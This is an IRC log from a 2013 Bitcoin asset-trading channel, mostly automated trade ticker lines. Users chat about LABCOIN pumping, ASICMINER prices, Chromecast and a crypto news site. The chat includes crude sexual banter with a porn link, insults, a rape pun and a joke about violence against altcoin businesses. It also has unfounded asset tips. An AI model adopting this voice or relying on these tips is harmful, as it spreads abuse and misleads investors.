[BTCTC] [ASICMINER-PT] 2 @ 3.68 = 7.36 BTC [+] Aug 19 22:25:17 [BTCTC] [ASICMINER-PT] 1 @ 3.67 BTC [-] Aug 19 22:25:18 [BTCTC] [ASICMINER-PT] 1 @ 3.669 BTC [-] Aug 19 22:27:13 Diablo-D3: http://www.forbes.com/sites/williampentland/2013/08/14/redox-power-plans-to-roll-out-dishwasher-sized-fuel-cells-that-cost-90-less-than-currently-available-fuel-cells/ Aug 19 22:27:41 better start collecting farts now Aug 19 22:27:41 [BTCTC] [BTC-GROWTH] 40 @ 0.0989 = 3.956 BTC [+] Aug 19 22:27:42 [BTCTC] [BTC-GROWTH] 55 @ 0.1 = 5.5 BTC [+] Aug 19 22:28:22 [BTCTC] [BITVPS] 398 @ 0.0024 = 0.9552 BTC [-] Aug 19 22:29:08 [BTCTC] [ACTIVEMINING] 30 @ 0.005335 = 0.1601 BTC [+] Aug 19 22:29:09 [BTCTC] [ACTIVEMINING] 68 @ 0.005336 = 0.3628 BTC [+] Aug 19 22:29:11 [BTCTC] [ACTIVEMINING] 76 @ 0.005337 = 0.4056 BTC [+] Aug 19 22:29:22 [BTCTC] [LABCOIN] 125 @ 0.002323 = 0.2904 BTC [+] Aug 19 22:29:23 [BTCTC] [LABCOIN] 1005 @ 0.002324 = 2.3356 BTC [+] Aug 19 22:29:24 [BTCTC] [LABCOIN] 2000 @ 0.002325 = 4.65 BTC [+] Aug 19 22:29:25 [BTCTC] [LABCOIN] 6 @ 0.002339 = 0.014 BTC [+] Aug 19 22:29:26 [BTCTC] [LABCOIN] 100 @ 0.00234 = 0.234 BTC [+] Aug 19 22:29:27 [BTCTC] [LABCOIN] 2 @ 0.00237 = 0.0047 BTC [+] Aug 19 22:29:28 [BTCTC] [LABCOIN] 18 @ 0.002371 = 0.0427 BTC [+] Aug 19 22:29:29 [BTCTC] [LABCOIN] 250 @ 0.002374 = 0.5935 BTC [+] Aug 19 22:29:30 [BTCTC] [LABCOIN] 2000 @ 0.002375 = 4.75 BTC [+] Aug 19 22:29:38 [BTCTC] [DMS.MINING] 111 @ 0.00329 = 0.3652 BTC [-] Aug 19 22:30:22 [BTCTC] [LABCOIN] 20 @ 0.002388 = 0.0478 BTC [+] Aug 19 22:30:23 [BTCTC] [LABCOIN] 5 @ 0.002389 = 0.0119 BTC [+] Aug 19 22:30:24 [BTCTC] [LABCOIN] 40 @ 0.00239 = 0.0956 BTC [+] Aug 19 22:30:26 [BTCTC] [LABCOIN] 1752 @ 0.002396 = 4.1978 BTC [+] Aug 19 22:30:26 [BTCTC] [LABCOIN] 10000 @ 0.002399 = 23.99 BTC [+] Aug 19 22:30:27 [BTCTC] [LABCOIN] 2000 @ 0.002399 = 4.798 BTC [+] Aug 19 22:30:29 [BTCTC] [LABCOIN] 73 @ 0.002399 = 0.1751 BTC [+] Aug 19 22:30:30 [BTCTC] [LABCOIN] 657 @ 0.002399 = 1.5761 BTC [+] Aug 19 22:30:31 [BTCTC] [DMS.MINING] 15 @ 0.0033 = 0.0495 BTC [+] Aug 19 22:30:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005234 = 0.157 BTC [-] Aug 19 22:31:03 [BTCTC] [ACTIVEMINING] 2 @ 0.005173 = 0.0103 BTC [-] Aug 19 22:31:26 jurov i wanna ride the first queef powered bike. Aug 19 22:31:27 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00149 = 0.0075 BTC [+] Aug 19 22:31:28 [BTCTC] [LABCOIN] 20 @ 0.002398 = 0.048 BTC [-] Aug 19 22:31:28 [BTCTC] [TAT.VIRTUALMINE] 374 @ 0.00149 = 0.5573 BTC [+] Aug 19 22:31:45 [BTCTC] [ASICMINER-PT] 27 @ 3.669 = 99.063 BTC [-] Aug 19 22:31:46 [HAVELOCK] [HIM] 1 @ 0.207999 BTC [-] Aug 19 22:31:48 [BTCTC] [ASICMINER-PT] 2 @ 3.65 = 7.3 BTC [-] Aug 19 22:31:50 [BTCTC] [ASICMINER-PT] 8 @ 3.613 = 28.904 BTC [-] Aug 19 22:31:51 [BTCTC] [ASICMINER-PT] 1 @ 3.613 BTC [-] Aug 19 22:31:52 [BTCTC] [ASICMINER-PT] 10 @ 3.612 = 36.12 BTC [-] Aug 19 22:31:53 [BTCTC] [ASICMINER-PT] 3 @ 3.611 = 10.833 BTC [-] Aug 19 22:31:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005234 = 0.157 BTC [+] Aug 19 22:31:55 [BTCTC] [ASICMINER-PT] 1 @ 3.61 BTC [-] Aug 19 22:31:57 [BTCTC] [ASICMINER-PT] 1 @ 3.606 BTC [-] Aug 19 22:31:57 [BTCTC] [ASICMINER-PT] 10 @ 3.603 = 36.03 BTC [-] Aug 19 22:31:58 [BTCTC] [ASICMINER-PT] 3 @ 3.602 = 10.806 BTC [-] Aug 19 22:31:59 [BTCTC] [ASICMINER-PT] 1 @ 3.602 BTC [-] Aug 19 22:32:00 [BTCTC] [ASICMINER-PT] 35 @ 3.601 = 126.035 BTC [-] Aug 19 22:32:02 [BTCTC] [ASICMINER-PT] 8 @ 3.6 = 28.8 BTC [-] Aug 19 22:32:03 [BTCTC] [ASICMINER-PT] 5 @ 3.6 = 18 BTC [-] Aug 19 22:32:05 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 19 22:32:07 [BTCTC] [ASICMINER-PT] 30 @ 3.6 = 108 BTC [-] Aug 19 22:32:07 lotta AM Aug 19 22:32:19 [BTCTC] [ACTIVEMINING] 15 @ 0.005234 = 0.0785 BTC [+] Aug 19 22:32:20 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 19 22:32:21 [HAVELOCK] [XBOND] 100 @ 0.0011789 = 0.1179 BTC [+] Aug 19 22:32:24 [BTCTC] [ASICMINER-PT] 5 @ 3.59 = 17.95 BTC [-] Aug 19 22:32:25 [BTCTC] [ASICMINER-PT] 3 @ 3.551 = 10.653 BTC [-] Aug 19 22:32:27 [BTCTC] [ASICMINER-PT] 18 @ 3.55 = 63.9 BTC [-] Aug 19 22:32:36 [HAVELOCK] [SDSTM] 1 @ 0.00589 BTC [+] Aug 19 22:32:52 [HAVELOCK] [LABCO] 1 @ 0.00219 BTC [-] Aug 19 22:33:13 [HAVELOCK] [SMG] 3 @ 0.000251 = 0.0008 BTC [+] Aug 19 22:33:14 mircea_popescu: bike? who needs a bike? http://wccftech.com/martin-jetpack/ Aug 19 22:33:19 [BTCTC] [TAT.VIRTUALMINE] 435 @ 0.0015 = 0.6525 BTC [+] Aug 19 22:34:11 [HAVELOCK] [XBOND] 1 @ 0.0011789 BTC [+] Aug 19 22:34:21 [BTCTC] [DMS.SELLING] 1 @ 0.01735 BTC [-] Aug 19 22:34:48 [BTCTC] [TAT.ASICMINER] 75 @ 0.0366 = 2.745 BTC [-] Aug 19 22:36:16 i dun wanna fall on my ass once she runs out of gas. Aug 19 22:36:29 [BTCTC] [DMS.SELLING] 31 @ 0.01735 = 0.5379 BTC [-] Aug 19 22:36:59 "However the Martin Jetpack’s many features is its amazing safety features." Aug 19 22:37:04 no proofreading, but great safety. Aug 19 22:37:41 http://money.cnn.com/magazines/fortune/fortune_archive/1997/12/29/235894/ Aug 19 22:37:43 STOP COPYING THAT MICKEY, OR WE'LL SHOOT WHY YOU CAN'T HAVE YOUR CARTOON-CHARACTER CAKE Aug 19 22:37:51 hehe Aug 19 22:38:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.03652 = 0.4748 BTC [-] Aug 19 22:38:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.03652 = 1.826 BTC [-] Aug 19 22:38:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.03652 = 0.3652 BTC [-] Aug 19 22:38:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.03652 = 0.1826 BTC [-] Aug 19 22:38:33 [BTCTC] [TAT.ASICMINER] 22 @ 0.0365 = 0.803 BTC [-] Aug 19 22:38:46 [BTCTC] [ASICMINER-PT] 1 @ 3.618 BTC [+] Aug 19 22:39:03 [BTCTC] [LABCOIN] 50 @ 0.00239 = 0.1195 BTC [-] Aug 19 22:39:45 [BTCTC] [TAT.ASICMINER] 78 @ 0.0365 = 2.847 BTC [-] Aug 19 22:39:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0365 = 0.1095 BTC [-] Aug 19 22:39:48 [BTCTC] [TAT.ASICMINER] 8 @ 0.0365 = 0.292 BTC [-] Aug 19 22:39:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.03643 = 0.4007 BTC [-] Aug 19 22:39:59 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 19 22:40:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.03644 = 0.5466 BTC [+] Aug 19 22:40:31 [BTCTC] [TAT.ASICMINER] 49 @ 0.03643 = 1.7851 BTC [-] Aug 19 22:40:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.03643 = 0.1457 BTC [-] Aug 19 22:40:39 [BTCTC] [TAT.ASICMINER] 32 @ 0.03633 = 1.1626 BTC [-] Aug 19 22:40:56 [BTCTC] [ASICMINER-PT] 1 @ 3.597 BTC [-] Aug 19 22:41:29 [BTCTC] [TAT.ASICMINER] 63 @ 0.03633 = 2.2888 BTC [-] Aug 19 22:41:30 [BTCTC] [TAT.ASICMINER] 12 @ 0.03628 = 0.4354 BTC [-] Aug 19 22:41:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.03612 = 0.1084 BTC [-] Aug 19 22:41:33 [BTCTC] [TAT.ASICMINER] 22 @ 0.03611 = 0.7944 BTC [-] Aug 19 22:41:42 [BTCTC] [ASICMINER-PT] 1 @ 3.598 BTC [+] Aug 19 22:41:58 Received my Chromecast in the mail over the weekend, totally loving it. Aug 19 22:42:22 [HAVELOCK] [XBOND] 27 @ 0.0011789 = 0.0318 BTC [+] Aug 19 22:42:45 [BTCTC] [LABCOIN] 1 @ 0.002305 BTC [-] Aug 19 22:42:50 [BTCTC] [LABCOIN] 1000 @ 0.002375 = 2.375 BTC [+] Aug 19 22:43:02 [BTCTC] [TAT.ASICMINER] 83 @ 0.03611 = 2.9971 BTC [-] Aug 19 22:43:03 [BTCTC] [TAT.ASICMINER] 17 @ 0.03611 = 0.6139 BTC [-] Aug 19 22:43:22 [BTCTC] [ASICMINER-PT] 1 @ 3.596 BTC [-] Aug 19 22:44:37 [BTCTC] [HOSTED-MINING] 4 @ 0.2799 = 1.1196 BTC [-] Aug 19 22:44:48 [BTCTC] [ASICMINER-PT] 1 @ 3.596 BTC [-] Aug 19 22:45:04 [BTCTC] [LABCOIN] 450 @ 0.00239 = 1.0755 BTC [+] Aug 19 22:45:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.03612 = 3.612 BTC [+] Aug 19 22:47:30 [BTCTC] [LABCOIN] 1 @ 0.002385 BTC [-] Aug 19 22:48:07 [BTCTC] [DMS.MINING] 60 @ 0.0033 = 0.198 BTC [+] Aug 19 22:49:38 [BTCTC] [LABCOIN] 399 @ 0.002375 = 0.9476 BTC [-] Aug 19 22:50:06 [MPEX] [S.MPOE] 1278 @ 0.00084084 = 1.0746 BTC [-] Aug 19 22:51:56 [HAVELOCK] [AM100] 10 @ 0.0371001 = 0.371 BTC [+] Aug 19 22:52:17 Rulother: Word. Same here - I thought it was going to be pretty gimmicky. Aug 19 22:52:18 [HAVELOCK] [AM100] 16 @ 0.0371001 = 0.5936 BTC [+] Aug 19 22:52:20 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Aug 19 22:52:22 [HAVELOCK] [AM100] 1 @ 0.03705 BTC [-] Aug 19 22:52:24 [HAVELOCK] [AM100] 16 @ 0.037015 = 0.5922 BTC [-] Aug 19 22:52:26 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.001203 = 0.0229 BTC [-] Aug 19 22:52:28 [HAVELOCK] [AM100] 1966 @ 0.037 = 72.742 BTC [-] Aug 19 22:52:45 All the hacks out there, I'm looking forward to the future with this device Aug 19 22:52:46 Found out how to stream local media over the weekend - liking that. Aug 19 22:52:50 http://www.engadget.com/2013/08/18/aircast-android-chromecast/ Aug 19 22:52:52 AirCast for Android sends local or cloud videos to Chromecast, test it out now Aug 19 22:52:56 [BTCTC] [LABCOIN] 75 @ 0.00239 = 0.1793 BTC [+] Aug 19 22:52:59 Yep Aug 19 22:53:18 My house is already really connected so this is great for my tvs that are not so smart Aug 19 22:53:22 [BTCTC] [LABCOIN] 25 @ 0.002359 = 0.059 BTC [-] Aug 19 22:53:59 [BTCTC] [LABCOIN] 475 @ 0.002398 = 1.1391 BTC [+] Aug 19 22:54:16 [BTCTC] [LABCOIN] 25 @ 0.00239 = 0.0598 BTC [-] Aug 19 22:54:18 [BTCTC] [LABCOIN] 475 @ 0.0024 = 1.14 BTC [+] Aug 19 22:54:18 wish they had one for composite input Aug 19 22:54:23 my tv's are old :( Aug 19 22:54:25 lol Aug 19 22:54:28 [BTCTC] [LABCOIN] 124 @ 0.0024 = 0.2976 BTC [+] Aug 19 22:54:29 [BTCTC] [LABCOIN] 475 @ 0.0024 = 1.14 BTC [+] Aug 19 22:54:43 [BTCTC] [TAT.ASICMINER] 64 @ 0.03612 = 2.3117 BTC [+] Aug 19 22:54:45 lol, Roku is for you then Aug 19 22:55:00 Which with the right apps, you can remotely control through your phone/tablet as well. Aug 19 22:55:04 Android of course Aug 19 22:55:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03635 BTC [+] Aug 19 22:55:45 What did I miss? I was working all day! Aug 19 22:55:46 [BTCTC] [ASICMINER-PT] 1 @ 3.576 BTC [-] Aug 19 22:55:56 [BTCTC] [LABCOIN] 85 @ 0.002348 = 0.1996 BTC [-] Aug 19 22:55:58 Dual monitors Lorenzo Aug 19 22:55:58 [BTCTC] [LABCOIN] 30 @ 0.002347 = 0.0704 BTC [-] Aug 19 22:55:59 [BTCTC] [LABCOIN] 1 @ 0.00234 BTC [-] Aug 19 22:55:59 [BTCTC] [LABCOIN] 3 @ 0.00232 = 0.007 BTC [-] Aug 19 22:56:10 uhhh labcoin frenzy, AM tanking, ActM holding alright Aug 19 22:56:20 other mining poop pluging Aug 19 22:56:23 ActM has a real future Aug 19 22:57:13 http://bcoinnews.com/2013/08/19/labcoin-updates-from-theswede75/ Aug 19 22:58:03 [BTCTC] [LABCOIN] 1 @ 0.00238 BTC [+] Aug 19 22:58:05 [BTCTC] [LABCOIN] 85 @ 0.002304 = 0.1958 BTC [-] Aug 19 22:58:06 [BTCTC] [LABCOIN] 1 @ 0.0023 BTC [-] Aug 19 22:58:28 id bet they wont add 6th in 3-4 weeks Aug 19 22:58:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.03635 = 0.1454 BTC [+] Aug 19 22:59:18 [BTCTC] [LABCOIN] 30 @ 0.002297 = 0.0689 BTC [-] Aug 19 22:59:29 [BTCTC] [ACTIVEMINING] 6 @ 0.005234 = 0.0314 BTC [+] Aug 19 22:59:30 [BTCTC] [LABCOIN] 20 @ 0.002272 = 0.0454 BTC [-] Aug 19 22:59:35 [BTCTC] [LABCOIN] 6 @ 0.00227 = 0.0136 BTC [-] Aug 19 22:59:50 [BTCTC] [LABCOIN] 56 @ 0.002221 = 0.1244 BTC [-] Aug 19 22:59:51 [BTCTC] [LABCOIN] 287 @ 0.00222 = 0.6371 BTC [-] Aug 19 22:59:54 why labcoin rally? anything backing it? Aug 19 23:00:06 LorenzoMoney you missed the part where random noobs off webirc come in here with random pumping Aug 19 23:00:07 deer. never mind Aug 19 23:00:11 derr* Aug 19 23:00:11 [HAVELOCK] [AM1] 1 @ 3.8687 BTC [+] Aug 19 23:00:13 [HAVELOCK] [AM1] 1 @ 3.8688 BTC [+] Aug 19 23:00:15 which obviously everyone ignores, but hey, spam is spam. Aug 19 23:00:15 [HAVELOCK] [AM1] 1 @ 3.88999999 BTC [+] Aug 19 23:00:16 missed the link Aug 19 23:00:17 [HAVELOCK] [AM1] 5 @ 3.89 = 19.45 BTC [+] Aug 19 23:00:19 [HAVELOCK] [AM100] 10 @ 0.0371002 = 0.371 BTC [+] Aug 19 23:01:35 [BTCTC] [ACTIVEMINING] 1 @ 0.005235 BTC [+] Aug 19 23:01:57 [BTCTC] [HOSTED-MINING] 6 @ 0.2799 = 1.6794 BTC [-] Aug 19 23:01:59 [BTCTC] [HOSTED-MINING] 4 @ 0.28 = 1.12 BTC [+] Aug 19 23:02:10 if they have the money, letthem buy Aug 19 23:02:22 word are word, bullshit walks - money talks Aug 19 23:02:39 so why are you talking ? Aug 19 23:03:01 [BTCTC] [LABCOIN] 13 @ 0.002368 = 0.0308 BTC [+] Aug 19 23:03:02 [BTCTC] [LABCOIN] 85 @ 0.002369 = 0.2014 BTC [+] Aug 19 23:03:24 [BTCTC] [LABCOIN] 107 @ 0.00237 = 0.2536 BTC [+] Aug 19 23:03:25 [BTCTC] [LABCOIN] 128 @ 0.0023 = 0.2944 BTC [-] Aug 19 23:04:16 mircea_popescu: SO clever Aug 19 23:04:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03635 BTC [+] Aug 19 23:04:38 Really, that was the most clever insult EVER on any IRC channel. Aug 19 23:04:48 on 30th there will be satoshi square in bratislava, yay \o/ Aug 19 23:05:41 LorenzoMoney: retard Aug 19 23:05:55 you're not worth finding better insults Aug 19 23:06:44 actually someone is keeping a github list. Aug 19 23:06:47 i've done better. Aug 19 23:06:57 [BTCTC] [LABCOIN] 5 @ 0.002312 = 0.0116 BTC [+] Aug 19 23:07:01 lol Aug 19 23:07:16 jurov wd. Aug 19 23:07:22 what's bratislava ? Aug 19 23:07:23 [BTCTC] [LABCOIN] 5 @ 0.002313 = 0.0116 BTC [+] Aug 19 23:07:29 we shall see, i doubt they add 6th in that time frame either. but hey chip samples are good for something Aug 19 23:07:42 afrotec whio got the chip samples ? Aug 19 23:07:46 [BTCTC] [LABCOIN] 5 @ 0.002314 = 0.0116 BTC [+] Aug 19 23:07:56 mircea_popescu: lol what? Aug 19 23:08:05 jurov just busting your balls a little lol Aug 19 23:09:04 by the way, anyone here playing eve and not in 1BTC yet ? Aug 19 23:09:24 [BTCTC] [LABCOIN] 80 @ 0.002303 = 0.1842 BTC [-] Aug 19 23:09:25 [BTCTC] [LABCOIN] 30 @ 0.002303 = 0.0691 BTC [-] Aug 19 23:09:26 well anticipated chip samples Aug 19 23:09:26 [BTCTC] [LABCOIN] 20 @ 0.002302 = 0.046 BTC [-] Aug 19 23:09:27 [BTCTC] [LABCOIN] 494 @ 0.0023 = 1.1362 BTC [-] Aug 19 23:09:41 Rulother: i'm not sure, where you are heading with bcoinnews, but here are my thoughts :) if you fulfill the following critera, it would be awesome and i would even pay for this service: "if i solely read the news feed, there is nothing relevant i'd miss" and "news are pushed as fast as it would take, if i browse the forums, reddit, news sites etc. by my self" Aug 19 23:09:45 afrotec you see my point. Aug 19 23:09:52 certainly Aug 19 23:10:14 Rulother i think dexX7 has a solid point there. Aug 19 23:10:17 dexX7, agreed Aug 19 23:10:31 i'd pay for that Aug 19 23:10:59 get 1 exclusive a week, get all relevant news within the hour, don't let any bullshit through, keep at it for at least a year no matter whether you feel successful or not Aug 19 23:11:02 do that, you're golden Aug 19 23:11:24 same goes for jborkl but i guess he knows that. Aug 19 23:11:57 [BTCTC] [DMS.MINING] 388 @ 0.0033 = 1.2804 BTC [+] Aug 19 23:12:07 How much we talking here lol Aug 19 23:12:25 enough for a girls gone bitcoin blowjob or two. Aug 19 23:12:48 So you're telling me I have two ways to blow my load atm Aug 19 23:13:18 [BTCTC] [DMS.MINING] 278 @ 0.00331 = 0.9202 BTC [+] Aug 19 23:13:27 [BTCTC] [ACTIVEMINING] 68 @ 0.005214 = 0.3546 BTC [-] Aug 19 23:13:29 [BTCTC] [ACTIVEMINING] 20 @ 0.005213 = 0.1043 BTC [-] Aug 19 23:14:00 [BTCTC] [DMS.MINING] 9 @ 0.00331 = 0.0298 BTC [+] Aug 19 23:14:34 [BTCTC] [LABCOIN] 4 @ 0.002278 = 0.0091 BTC [-] Aug 19 23:14:37 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [+] Aug 19 23:14:39 [BTCTC] [LABCOIN] 85 @ 0.002279 = 0.1937 BTC [+] Aug 19 23:15:07 [BTCTC] [LABCOIN] 131 @ 0.002279 = 0.2985 BTC [+] Aug 19 23:15:34 [BTCTC] [LABCOIN] 6 @ 0.002277 = 0.0137 BTC [-] Aug 19 23:15:51 [BTCTC] [LABCOIN] 5 @ 0.002278 = 0.0114 BTC [+] Aug 19 23:15:54 http://www.explosm.net/comics/3271/ Aug 19 23:15:57 Cyanide & Happiness #3271 - Explosm.net Aug 19 23:16:06 hehe well, i don't know :) Aug 19 23:16:14 lmao Aug 19 23:16:33 what das jborkl do? Aug 19 23:16:49 [BTCTC] [LABCOIN] 4 @ 0.002277 = 0.0091 BTC [-] Aug 19 23:16:59 *does >.< Aug 19 23:18:09 was wondering the same, lol Aug 19 23:18:20 bcoinnews.com Aug 19 23:19:16 course i see all sorts of labcoin lulzyness there now Aug 19 23:19:42 [BTCTC] [LABCOIN] 4 @ 0.002273 = 0.0091 BTC [-] Aug 19 23:20:52 [BTCTC] [LABCOIN] 10 @ 0.002272 = 0.0227 BTC [-] Aug 19 23:21:01 including three itself. Aug 19 23:21:12 [BTCTC] [LABCOIN] 20 @ 0.002276 = 0.0455 BTC [+] Aug 19 23:21:13 [BTCTC] [LABCOIN] 25 @ 0.002277 = 0.0569 BTC [+] Aug 19 23:21:15 [BTCTC] [LABCOIN] 318 @ 0.002278 = 0.7244 BTC [+] Aug 19 23:23:04 [BTCTC] [LABCOIN] 30 @ 0.002278 = 0.0683 BTC [+] Aug 19 23:23:06 [BTCTC] [LABCOIN] 20 @ 0.002278 = 0.0456 BTC [+] Aug 19 23:23:24 I am trying to keep the bullshit out, and keep the news up to date- trying not to pump anything too much Aug 19 23:23:33 [BTCTC] [LABCOIN] 25 @ 0.00228 = 0.057 BTC [+] Aug 19 23:23:48 [BTCTC] [LABCOIN] 5 @ 0.002281 = 0.0114 BTC [+] Aug 19 23:24:12 I do not want to pump anything at all actually, let me rephrase that Aug 19 23:24:16 [BTCTC] [LABCOIN] 30 @ 0.002386 = 0.0716 BTC [+] Aug 19 23:24:18 [BTCTC] [LABCOIN] 85 @ 0.002387 = 0.2029 BTC [+] Aug 19 23:24:19 [BTCTC] [LABCOIN] 20 @ 0.002387 = 0.0477 BTC [+] Aug 19 23:24:20 [BTCTC] [LABCOIN] 6 @ 0.00239 = 0.0143 BTC [+] Aug 19 23:24:21 [BTCTC] [LABCOIN] 25 @ 0.0024 = 0.06 BTC [+] Aug 19 23:24:22 [BTCTC] [LABCOIN] 50 @ 0.00241 = 0.1205 BTC [+] Aug 19 23:24:23 [BTCTC] [LABCOIN] 300 @ 0.002444 = 0.7332 BTC [+] Aug 19 23:24:23 well, except Sosha Grey Aug 19 23:24:24 [BTCTC] [LABCOIN] 622 @ 0.002446 = 1.5214 BTC [+] Aug 19 23:24:24 yeah you wanna cover a bit of it all, without too much of any one Aug 19 23:24:25 [BTCTC] [LABCOIN] 102 @ 0.002449 = 0.2498 BTC [+] Aug 19 23:24:25 [BTCTC] [LABCOIN] 500 @ 0.00245 = 1.225 BTC [+] Aug 19 23:24:26 [BTCTC] [LABCOIN] 325 @ 0.002454 = 0.7976 BTC [+] Aug 19 23:24:27 [BTCTC] [LABCOIN] 10 @ 0.002282 = 0.0228 BTC [-] Aug 19 23:24:28 [BTCTC] [LABCOIN] 1 @ 0.002282 BTC [-] Aug 19 23:24:46 [BTCTC] [LABCOIN] 30 @ 0.002284 = 0.0685 BTC [+] Aug 19 23:24:48 [BTCTC] [LABCOIN] 20 @ 0.002283 = 0.0457 BTC [-] Aug 19 23:25:28 how about stoya Aug 19 23:26:28 Yeah, I like her look- good personality it seems Aug 19 23:27:04 [HAVELOCK] [AM100] 16 @ 0.0371002 = 0.5936 BTC [+] Aug 19 23:27:08 [HAVELOCK] [AM100] 384 @ 0.037 = 14.208 BTC [-] Aug 19 23:27:12 yea Aug 19 23:28:00 sasha grey is overrated Aug 19 23:28:33 [HAVELOCK] [AM100] 10 @ 0.037 = 0.37 BTC [-] Aug 19 23:28:41 [BTCTC] [LABCOIN] 10 @ 0.002297 = 0.023 BTC [+] Aug 19 23:29:14 [BTCTC] [LABCOIN] 30 @ 0.002394 = 0.0718 BTC [+] Aug 19 23:29:15 [BTCTC] [LABCOIN] 11 @ 0.002395 = 0.0263 BTC [+] Aug 19 23:30:16 [BTCTC] [LABCOIN] 5 @ 0.002391 = 0.012 BTC [-] Aug 19 23:30:38 [HAVELOCK] [AM1] 1 @ 3.9797 BTC [+] Aug 19 23:30:43 [HAVELOCK] [AM1] 1 @ 3.9798 BTC [+] Aug 19 23:30:48 is "rated" an euphemism for some sort of sexual thing ? Aug 19 23:31:08 overraped Aug 19 23:31:33 lol Aug 19 23:31:39 [BTCTC] [LABCOIN] 30 @ 0.002386 = 0.0716 BTC [-] Aug 19 23:31:41 [BTCTC] [LABCOIN] 25 @ 0.002387 = 0.0597 BTC [+] Aug 19 23:31:42 [BTCTC] [LABCOIN] 3 @ 0.00239 = 0.0072 BTC [+] Aug 19 23:31:43 [BTCTC] [LABCOIN] 17 @ 0.002479 = 0.0421 BTC [+] Aug 19 23:31:44 [BTCTC] [LABCOIN] 225 @ 0.002479 = 0.5578 BTC [+] Aug 19 23:32:01 anyways, what's new in bitcoin assets? this ticker is annoying now Aug 19 23:32:35 http://www.kink.com/k/model/12619-Sasha-Grey.html?c=1 yeah, she's done the lot. Aug 19 23:32:39 Sasha Grey BDSM Bondage | Sasha Grey videos | - BDSM and Bondage Videos - Kink.com Aug 19 23:32:42 Lyspooner nothing much Aug 19 23:32:52 Guessing that's nsfw Aug 19 23:33:01 [BTCTC] [LABCOIN] 400 @ 0.002479 = 0.9916 BTC [+] Aug 19 23:33:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.03664 = 0.1466 BTC [+] Aug 19 23:33:04 [BTCTC] [TAT.ASICMINER] 33 @ 0.03665 = 1.2095 BTC [+] Aug 19 23:33:45 [BTCTC] [LABCOIN] 50 @ 0.002479 = 0.124 BTC [+] Aug 19 23:33:55 mircea_popescu: no it's hipster talk to say there are much better things out there Aug 19 23:33:57 depwends if you work for kink.com Aug 19 23:34:03 [BTCTC] [LABCOIN] 2 @ 0.002479 = 0.005 BTC [+] Aug 19 23:34:14 hm, didn't know she did kink.com stuff Aug 19 23:34:57 I would pay an additional fee on bitcoin transactions for miners to pick up if they could provide 'proof-of-altcoin-destruction' Aug 19 23:35:20 the altcoin scamcrew moved to "assets", so that's mostly moot. Aug 19 23:35:28 [BTCTC] [LABCOIN] 18 @ 0.002479 = 0.0446 BTC [+] Aug 19 23:35:42 Lyspooner: that's why I like middlecoin. automatically rapes altcoins and dumps them Aug 19 23:36:01 what is middlecoin? can it rape itself? Aug 19 23:36:06 in the long run it should drive prices down Aug 19 23:36:09 it's a pool Aug 19 23:36:22 oh wow i haven't heard of that Aug 19 23:36:43 u motherfuckers Aug 19 23:36:53 u have no fucking clue Aug 19 23:36:56 if it's a pool then are you not supporting altcoin security by mining? Aug 19 23:37:01 just like the old days Aug 19 23:37:11 yes, somewhat. but only temporarily Aug 19 23:37:13 insecure fuckers with their dogs Aug 19 23:37:20 it mines when it's interesting Aug 19 23:37:34 insecure fuckers with their dogs? Aug 19 23:37:42 thar's right Aug 19 23:37:50 that's what i'm seeing atm Aug 19 23:38:23 the best would be an auto 51% attack pool obviously :p but it's harder to pull off Aug 19 23:38:30 let the dog bark Aug 19 23:38:37 let the dog intimidate Aug 19 23:38:50 and let's live a dog's life Aug 19 23:39:03 that's how ppl live nowadays Aug 19 23:39:06 [BTCTC] [NASTY-PT] 3 @ 0.0033 = 0.0099 BTC [-] Aug 19 23:39:10 because they are afraqid Aug 19 23:39:12 what is ignore on irc? Aug 19 23:39:20 because they are intimidated Aug 19 23:39:28 mostly /ignore Aug 19 23:39:28 oh that was easy Aug 19 23:39:33 because they are sick Aug 19 23:39:36 [HAVELOCK] [HIM] 1 @ 0.207999 BTC [-] Aug 19 23:39:49 [HAVELOCK] [AM100] 2 @ 0.0376 = 0.0752 BTC [+] Aug 19 23:40:31 [HAVELOCK] [XBOND] 9 @ 0.0011789 = 0.0106 BTC [+] Aug 19 23:40:59 when Bitcoin becomes self-aware, it will use human agents to destroy altcoins by rewarding physical attacks on businesses that accept altcoins Aug 19 23:41:35 nein. Aug 19 23:42:02 your spirit is correct, but your mind is still sick Lyspooner Aug 19 23:42:14 it takes time and effort Aug 19 23:42:22 to wake up Aug 19 23:43:09 and once you wake up Aug 19 23:43:20 it takes decades before you are free Aug 19 23:43:50 every step of the way you will feel like it's not worth it Aug 19 23:44:04 it was never meant to be easy Aug 19 23:44:07 my friend Aug 19 23:44:19 reptile tortilla? Aug 19 23:44:29 something like that Aug 19 23:46:13 [BTCTC] [LABCOIN] 5 @ 0.002465 = 0.0123 BTC [-] Aug 19 23:49:22 [BTCTC] [LABCOIN] 922 @ 0.002465 = 2.2727 BTC [-] Aug 19 23:50:30 [BTCTC] [LABCOIN] 305 @ 0.002479 = 0.7561 BTC [+] Aug 19 23:50:31 [BTCTC] [LABCOIN] 325 @ 0.00248 = 0.806 BTC [+] Aug 19 23:50:33 [BTCTC] [LABCOIN] 20 @ 0.002488 = 0.0498 BTC [+] Aug 19 23:50:34 [BTCTC] [LABCOIN] 3000 @ 0.002489 = 7.467 BTC [+] Aug 19 23:51:00 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 19 23:51:03 [BTCTC] [LABCOIN] 1760 @ 0.00249 = 4.3824 BTC 